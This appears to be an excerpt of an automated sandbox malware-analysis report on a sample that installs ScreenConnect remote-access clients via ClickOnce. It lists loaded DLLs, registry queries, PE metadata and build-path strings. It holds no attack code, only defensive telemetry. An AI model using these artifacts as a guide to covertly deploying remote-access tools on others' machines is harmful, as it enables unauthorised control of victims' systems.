                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wlidsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msxml6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gamestreamingext.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msauserext.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: tbs.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: elscore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: elstrans.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptngc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: winsta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: netapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: samcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: samlib.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: dwrite.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: textshaping.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: textinputframework.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: coreuicomponents.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: Qjq85KfhBC.exeStatic PE information: certificate valid
                  Source: Qjq85KfhBC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: Qjq85KfhBC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: Qjq85KfhBC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: Qjq85KfhBC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Qjq85KfhBC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: Qjq85KfhBC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: Qjq85KfhBC.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD045E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1754070448.0000000003192000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: Qjq85KfhBC.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD02AC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.1751348890.00000000028B2000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.1801490320.0000000000A00000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.1801752921.0000000002371000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
